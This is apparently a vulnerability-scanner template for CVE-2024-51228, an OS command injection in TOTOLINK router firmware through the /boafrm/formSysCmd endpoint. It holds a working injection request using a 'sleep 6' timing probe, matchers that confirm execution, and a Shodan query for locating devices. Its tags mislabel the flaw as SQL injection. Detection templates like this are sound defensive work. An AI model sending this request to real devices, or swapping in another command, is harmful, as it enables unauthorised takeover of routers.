An issue in TOTOLINK-CX-A3002RU V1.0.4-B20171106.1512 and TOTOLINK-CX-N150RT V2.1.6-B20171121.1002 and TOTOLINK-CX-N300RT V2.1.6-B20170724.1420 and TOTOLINK-CX-N300RT V2.1.8-B20171113.1408 and TOTOLINK-CX-N300RT V2.1.8-B20191010.1107 and TOTOLINK-CX-N302RE V2.0.2-B20170511.1523 allows a remote attacker to execute arbitrary code via the /boafrm/formSysCmd component.
PoC代码[已公开]
id: CVE-2024-51228
info:
name: TOTOLINK CX-A3002RU - Remote Code Execution
author: DhiyaneshDK
severity: medium
description: |
An issue in TOTOLINK-CX-A3002RU V1.0.4-B20171106.1512 and TOTOLINK-CX-N150RT V2.1.6-B20171121.1002 and TOTOLINK-CX-N300RT V2.1.6-B20170724.1420 and TOTOLINK-CX-N300RT V2.1.8-B20171113.1408 and TOTOLINK-CX-N300RT V2.1.8-B20191010.1107 and TOTOLINK-CX-N302RE V2.0.2-B20170511.1523 allows a remote attacker to execute arbitrary code via the /boafrm/formSysCmd component.
reference:
- https://github.com/yckuo-sdc/totolink-boa-api-vulnerabilities
- https://totolink.tw/support_view/A3002RU
- https://totolink.tw/support_view/N150RT
- https://www.totolink.tw/products_view/N300RT
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 6.8
cve-id: CVE-2024-51228
cwe-id: CWE-78
epss-score: 0.66185
epss-percentile: 0.98478
metadata:
max-request: 1
shodan-query: html:"TOTOLINK"
tags: cve,cve2024,totolink,time-based-sqli,sqli
http:
- raw:
- |
POST /boafrm/formSysCmd HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
sysCmd=sleep%206
matchers:
- type: dsl
dsl:
- "duration>=6"
- 'contains(server,"Boa/0.94")'
- "status_code == 302"
condition: and
# digest: 4a0a004730450220086acbd18d93b217b8e9b26082fe11f5c6b386acdee38b4a2d3ed2f1e2bcedd6022100e3e820f0932d5f46b8c8b3da7fe073596e717332704eb2ebc1f47106576b382b:922c64590222798bb761d5b6d8e72950